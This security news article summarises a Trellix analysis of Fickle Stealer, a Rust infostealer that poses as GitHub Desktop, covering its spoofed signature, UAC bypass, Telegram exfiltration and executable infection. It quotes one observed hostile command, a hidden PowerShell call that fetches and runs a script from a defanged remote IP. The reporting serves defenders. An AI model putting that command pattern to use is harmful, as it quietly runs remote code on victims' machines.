Fickle Stealer: The New Rust-Based Malware Masquerading as GitHub Desktop

Fickle Stealer malware
Attack flow | Image: Trellix

In a recent report by Trellix researchers Mallikarjun Wali and Sangram Mohapatro, a new Rust-based malware called Fickle Stealer has surfaced, posing a significant threat to cybersecurity. Fickle Stealer is designed to steal sensitive information from compromised systems, from personal credentials and browsing histories to cryptocurrency wallet details. As Trellix notes, this malware spreads via “various attack vectors, including phishing (malicious attachments), drive-by downloads, exploit kits, and social engineering.”

Fickle Stealer, which appeared in May 2024, is particularly deceptive in its approach, employing numerous evasion techniques. It masquerades as legitimate applications, including GitHub Desktop for Windows, with a digital signature that falsely claims to be from GitHub Inc. and is even counter-signed by “Microsoft Public RSA Time Stamping Authority.” Trellix observed that “the file is spoofing itself as a GitHub Desktop application and also has an invalid digital signature” in an attempt to appear legitimate and evade initial scrutiny.

GitHub Desktop File Metadata | Image: Trellix

The malware’s attack process is multi-staged, relying on several preparatory steps to evade detection and establish control. Upon execution, it bypasses User Account Control (UAC) using a PowerShell script and connects to a command-and-control (C2) server. A key feature of Fickle Stealer is its use of custom packers and obfuscation, which Trellix highlights as complicating traditional detection methods and analysis. By “employing anti-analysis techniques to escape sandbox environments and debugging tools,” the malware can evade detection while quietly siphoning data from infected systems.

Once installed, Fickle Stealer activates a PowerShell script, bypass.ps1 or u.ps1, which transmits sensitive information to the attacker through a Telegram bot. These details include the victim’s country, IP address, and operating system information. The PowerShell command observed during analysis runs hidden, with commands such as cmd /c powershell.exe -nop -win hidden -ExecutionPolicy Bypass -File \\\\185[.]213[.]208[.]245\\bypass\\u.ps1 directing data from the target system back to the C2 server.

The malware’s layered structure includes an additional script, engine.ps1, that searches for executables on the infected machine to further implant its code. This secondary script injects shell code to ensure the malware can persist, and the infected file paths are then base64 encoded and saved to prevent duplicate injections. Trellix notes that engine.ps1 “scans for executable files in the directories C:\Users, D:, E:, and F:” to spread Fickle Stealer’s reach within the compromised system.

To reduce the risk of Fickle Stealer malware, organizations should prioritize the use of updated security protocols and regularly review access controls.

Related Posts: